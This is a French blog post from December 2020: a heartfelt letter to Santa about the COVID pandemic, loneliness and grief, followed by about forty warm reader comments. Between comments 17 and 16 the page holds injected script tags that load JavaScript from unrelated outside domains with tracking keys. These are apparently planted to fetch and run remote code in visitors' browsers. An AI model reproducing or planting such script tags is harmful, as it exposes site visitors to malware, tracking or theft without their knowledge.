• Ma lettre au Père Noël

     

     

    JOYEUX NOEL

     

     

    Je viens vous partager ma lettre au Père Noël...

     

     

    "Cher Père Noël,

     

    L'année 2020 se termine et j'en suis très heureuse et mon petit doigt me dit que je ne suis pas la seule !

    J'espère que tu ne seras pas étonné, en atterrissant chez nous, de nous voir tous masqués...

    Un méchant virus nous attaque depuis presque un an, et il ne semble pas vouloir partir, il se prend pour une vedette, il a pris la grosse tête car il est à la une de toutes nos infos ! Si tu pouvais faire quelque chose, ça serait vraiment cool !

    Si tu pouvais aussi réchauffer le cœur de mes Ami(e)s qui sont dans la solitude, qui luttent contre la maladie et qui ont perdu un être cher, donne du courage à tous nos soignants.

    Pour qui, Noël n'aura pas la même saveur qu'auparavant !

    Glisse leur dans l'oreille que je pense à eux ♥♥♥

    Une dernière chose : calme la colère, la haine, tu dois bien avoir quelques paillettes magiques de gentillesse ?!...

     

    Je te souhaite Bon Courage pour la nuit qui t'attend !

     

    Quand tu passeras par l'Alsace, fais un Gros câlin à ma fille de la part de nous 4....

     

    Je te fais de GROS BISOUS"

     

    Valie

     

     

     

    JOYEUX NOEL

     

     

    Quant à vous qui avez lu, qui prenez le temps d'apprécier sincèrement ce que je partage sur mon blog ...

     

    Je vous souhaite un

     

     

    JOYEUX NOEL

     

     


  • Commentaires

    40
    Mercredi 30 Décembre 2020 à 16:49

    J'adore cette lettre au Père Noël

    biz

    39
    Dimanche 27 Décembre 2020 à 12:51

    Ton texte m'a beaucoup émue et je suis d'accord avec toi ... J'espère que tu as passé un réveillon aussi agréable que possible ... Je t'embrasse fort fort ! 

    Gros Bisous 

    38
    Dimanche 27 Décembre 2020 à 11:26

    Ton texte à bien raison, quelques paillettes magiques de gentillesse ne seraient pas superflues... 

    Bises

    Thaly

    37
    Samedi 26 Décembre 2020 à 19:33

    Gros bisous à toi et je te retrouve en 2021 car je pars lundi chez mon petit fils.

    36
    Vendredi 25 Décembre 2020 à 21:18
    Merci pour ce beau texte qui exprime ce que nous pensons tous et toutes Joyeux Noël à vous Gros bisous Pierrette67
    35
    Vendredi 25 Décembre 2020 à 20:33

    Un petit coucou ma chère Valie

    Pour te souhaiter une bonne fin de soirée de ce Noël 

    si spécial de cette année

    En pensées avec toi et de gros bisous

    ton amie  Janine

    34
    Vendredi 25 Décembre 2020 à 00:39
    Coucou
    Ici il neige.
    Je te souhaite une belle fête.
    Douce nuit
    Bisous du jeudi
    33
    Jeudi 24 Décembre 2020 à 13:18

    Doux Noël en Famille ma Tite Fée...

    Mon Coeur reste en éveil malgré la solitude de ce moment...Je reste sage promis...

    A très bientôt.Profite des tiens...

    Plein de bisous*

    Doux Noël a Vous..(Pause pour moi)..

    32
    Mercredi 23 Décembre 2020 à 20:18

    Bonsoir Valie

    Je vais joindre mon petit mot à toutes te amies et faire le souhait que tout ce que contient ta magnifique lettre soit pris en compte!!! Tu vois je ne fais qu'un seul petit vœux!!!

    Que ce noël te charge de quelques bons souvenirs malgré tout, afin que tout ne soit pas si noir!!

    Beaucoup de tendresse et plein de douceur pour t'accompagner pendant ces fêtes

    Gros bisous

    31
    Mercredi 23 Décembre 2020 à 19:49

    Que tous tes Vœux soient exaucés sans exception ma Douce Valie, à la lecture de cette Superbe lettre.

    Doux Noël à toi & les tiens.

    A très vite, Mille Bisous affectueux.

    30
    Mercredi 23 Décembre 2020 à 19:45

    Passe de bonne fete valie

    fait attention a toi 

    et prions pour que tout rentre vite dans l ordre

    bisous

    29
    Mercredi 23 Décembre 2020 à 17:34

    magnifique ta lettre ! 

    passe de bonnes fêtes quand même

    gros bisous

    28
    Jour de Mai
    Mercredi 23 Décembre 2020 à 17:27

    Coucou ma Valie, 

    Ta lettre au Père Noël est magnifique, j'y adhère complètement et surtout que tous ces vœux formulés se réalisent le plus rapidement possible que ce soit pour notre monde ou la santé de chacun. 

    Très doux Noël pour toi et les tiens et surtout que L'an prochain verra se réunir la plupart des familles. 

    Il pleut toujours, le vent est très important, surtout au bord de la mer. 

    Réponse à ton mail très bientôt.

    De très gros bisous ♥♥♥♥

    LN

    27
    Mercredi 23 Décembre 2020 à 17:18

    Bonjour ma Valie

    Quel magnifique texte en espérant que le Père Noël va le lire et qu'il va trouver dans sa hotte  de quoi

    en finir avec celui que l'on appel la Covid19 nous aimerions tellement avoir une meilleure  nouvelle année 2021 et de faire que ce monde se porte mieux et que les gens soient plus responsables.

    Bonne fin de journée et gros bisous

    et une bonne fête de Noël pour toi et ta famille

    gros bisous

    Janine

    Joyeux Noël

    26
    Mercredi 23 Décembre 2020 à 16:26

    Coucou ma belle Valie, ta lettre est très émouvante. Que ces voeux se réalisent pour toi et pour la planète entière. Et j'espère que le Père Noël donnera un bisou à ta fille pour toi et qu'elle le ressentira. Bon Noël ma jolie, gros bisous !

     

    25
    Mercredi 23 Décembre 2020 à 16:25

    cc valie passe de joyeuse fêtes de fin d'année ses une jolie lettre que tu a écrit je suie sur que le père noël va te gâter gros bisous

    24
    Mercredi 23 Décembre 2020 à 15:25
    23
    Mercredi 23 Décembre 2020 à 15:14

    J'aime beaucoup cette idées de lettre au Père Noël ;

    un joli texte qui résume parfaitement mon état d'esprit aussi.

    Joyeux Noël ; bisous / Nicole

    22
    Mercredi 23 Décembre 2020 à 14:04

    Très belle ta lettre au père noël!! J'ai ressentie beaucoup d'émotion que je partage avec toi.......

    Gros bisous et passe de joyeuses fêtes avec ta petite famille

    21
    Mercredi 23 Décembre 2020 à 14:04
    lamanuelle25

    Une superbe lettre au père Noël, tu dis tout ce que beaucoup d'entre nous pensent aussi! Passe de bonnes fêtes de Noël et bisous à ta fille qui sera en Alsace! Bisous à tous Nadine

    20
    marianne pirotte
    Mercredi 23 Décembre 2020 à 13:36

    Magnifique ton petit texte !!

    Passe de belles fêtes avec ta petite famille

    Gros bisous

    Marianne

    19
    Mercredi 23 Décembre 2020 à 13:30

    joyeux-noël-gif-animé-scintillant - les gifs animés de dentelledelune | Gif  joyeux noël, Joyeux noel, Joyeux noel animé

    coucou valie 

    trés belle lettre au pére noél 

    je te souhaite que tes voeux se réalisent 

    a lundi 

    bises 

    18
    Mercredi 23 Décembre 2020 à 12:34

      Une bien jolie lettre qui j'espère sera bien  lue  par  le  Père  Noël  et  qu'il pourra peut être réaliser quelques  voeux !!!!!!!

    gros  bisous  bon  Noël  à  toi  et  à  ta  famille

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    17
    mamijojo77100
    Mercredi 23 Décembre 2020 à 11:54

    trop forte valie. merveilleux texte a lire et a relire. ah s il pouvait t entendre ce serait miraculeux, mais bon l espoir fait vivre et on va essayeR de cRoire a un miracle Pour l an prochain..je te souhaite une bonne fin d annee avec tes enfants.. et un petit coup de fil de ta fille.. gbisous et a bientot et encore merci pour tes creations diverses et variees qui viennent decorer nos blogs..JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1608720521399" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    16
    Mercredi 23 Décembre 2020 à 10:34

    Très émouvante "lettre au Père Noël" bisous

    Moi je me confie en "Jésus" j'espère échapper à ce fléau, mais comme il y a des souches mutantes, je ne sais pas, je suis une personne "à risque" âgée, diabète et hypertension.... on verra, mais j'ai un peu peur de la 3ème vague... et les pauvres restaurateurs !!!! la réouverture le 21 janvier c'est incertain !!!!!

    ---> https://www.linternaute.com/sortir/sorties/resto/2519119-restaurants-la-date-de-reouverture-du-20-janvier-incertaine/

    --->https://4saisons4vents.site/DOSSIER-CORONAVIRUS.htm

     

    15
    Jacline-H-49
    Mercredi 23 Décembre 2020 à 10:04

    Bonjour ma chère Valie,

    Merveilleuse et émouvante ta lettre au père Noël, et je m'associe à toi, en espérant qu'il nous entende, mais pourquoi pas ? La magie de Noël s'exercera à qui y croira fortement.

    Joyeux Noël chez toi, fiston sera présent, et ta grande sera au bout du fil.

    Joyeux Noël aussi à toutes tes aminautes, même si pour certaines il sera moins beau que les précédents, mais n'y voyons que cette nativité d'abord. 

    Bonne journée et MERCI pour tout ce que tu partages avec nous toutes. 

    GROS BISOUS TENDRESSE de

    Jacline 

     

    14
    Mercredi 23 Décembre 2020 à 09:33

    Une bien belle lettre au Père Noel. Au cas ou il n'ait pas bien entendu je me joins à toi.

    Je vous souhaite un bon noël même si j'ai bien compris que votre grande ne sera pas présente

    Bonne journée. Gros bisous

    13
    Mercredi 23 Décembre 2020 à 09:21

    coucou Valie, c'est avec grande émotion que j'ai lu ta lettre

    et comme bien des personnes je souhaite du fond du coeur que les voeux soient accomplis

    que votre Noël qui a un goût amer cette année

    soit bon à toi et ta famille

    Joyeux Noël Valie, Bises

    12
    Mercredi 23 Décembre 2020 à 09:16

    Adorable ta lettre au Père noël ma tite Valie!

    J'espère que tous tes voeux seront exaussés!

    Beau noël à toi et ta petite famille!

    Bisous

    11
    JO
    Mercredi 23 Décembre 2020 à 09:12

    Coucou ma Valie

    Superbe lettre au Père Noël!!! qu'il puisse t'entendre et exaucer tes souhaits!!!

    Pour moi pas de Noël, pas de souhaits........ Si je lui demande de préserver ma fille, mon gendre, mes petits enfants et mon arrière petite fille et mon Dany bien sur♥ Hélas! il ne me ramènera pas mon fils chéri♥

    Les Noëls ne seront plus jamais pareil!!!

    Je te souhaite pleins de bonnes choses qui pourrait t'apporter joies et bonheurs

    Passe de bonnes fêtes même avec l'absence de fifille qui est dans ton coeur de maman

    Je pense très fort à toi♥♥♥♥

    GROS BISOUS 

    10
    Mercredi 23 Décembre 2020 à 09:06

    Chère Valie,

     

    Je forme des vœux pour que ta lettre au Père Noel soit entendue....

    Je te souhaite ainsi qu'à toutes les personnes de ton blog, de très bonnes fêtes de fin d'année.

    Bises à toutes!

     

    9
    Gaelle
    Mercredi 23 Décembre 2020 à 09:05
    Une lettre magnifique et émouvante.
    BRAVO valie.
    Joyeuses fêtes à toi et ta famille
    Biz
    Gaelle
    8
    Mercredi 23 Décembre 2020 à 08:43

    Ma Valie très émouvante ta lettre , c est le souhait de beaucoup que ce Virus parte et nous laisse tranquille, moi en ce jour de Noel j aurais une pensée pour ces plus de 60 000 morts partis sans personne à coté d eux , dans les Ephad sans leurs enfants, et puis je me dit que meme avec ces gentils voeux nous allons vers une année miroir, 2021 sera difficile , je suis presque heureuse de déménager , quand j aurais terminé mes rayons ce sera Mars et le printemps , le changement quoi, merci à toi ma Valie pour tout ce que tu nous a offert cette année sur ton blog avec tant de générosité , et fais toi quand meme de jolis souvenirs à Noel bisous du ♥ et d affection, tu es dans mon coeur 

    7
    Mercredi 23 Décembre 2020 à 08:36
    dane

    coucou ma valie j' espère que le père Noel t' entendra , il est vrai que ce virus prend des vies, rend bien malade, nous obliges aux contraintes, pour les personnels soignants les réduisent a l' épuisement,  vivement que l' on s' en sorte , je te souhaite de bonnes fêtes de fin d' année et te dit a très vite de même pour tes proches 

    6
    Mercredi 23 Décembre 2020 à 08:16

    Bonjour Valie 

    je viens de lire avec attention ta lettre adressée au père Noël.j'ai ressentie beaucoup d'émotion  tu as dit beaucoup de choses que je ressens très fort . Père  Noël Stp exhausse ces vœux. Je profite de cet instant pour te souhaiter un joyeux Noël.je t'envoie toute mon amitié et des gros bisous    

    5
    Mercredi 23 Décembre 2020 à 07:57

    hello Valie 

    Ce seront des fêtes  bien triste , loin des êtres que l'on aime  mais Père Noël nous apportera une année meilleure où nous pourrons revivre  et sortir et rencontrer ceux qui nous sont chers. 

    A bientôt Valie , passe de bonnes fêtes !!

    bisous

    4
    Mercredi 23 Décembre 2020 à 07:56

    Ta lettre est touchante Valie. J'espère juste que tes vœux seront exaussés... Bon Noël à toi aussi malgré tout ! Bisous bisous !

    3
    Mercredi 23 Décembre 2020 à 07:23

    Bonjour Valie belle lettre que je partage entièrement pourvu que 2021 laisse ce satané virus derrière nous mais je pense qu'il ne faut pas trop rêver. Joyeux Noêl à toi aussi ainsi qu' à ta famille. En Alsace j' aurai due être la semaine prochaine, mais annulée car pas de sorties possibles.
    Je te souhaite un Heureux Noêl et merci pour toutes ces belles créations.
    Amicalement 

    Claudine54 et ses titous

    2
    Mercredi 23 Décembre 2020 à 07:14

    Bonjour ma Valie, merci pour ces bonnes paroles....idem de ma part !!! je te souhaite un merveilleux Noël 

    Gros Bisous de Pat

    1
    Mercredi 23 Décembre 2020 à 07:13
    J'adhère complètement à ta lettre pour le Père Noël ! Je te souhaite un très bon Noël malgré tout ! Porte toi bien et qui sait peut-être aurons-nous la chance de nous rencontrer en 2021 quand tout sera redevenu "normal". Gros bisous et à très bientôt via nos mails
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :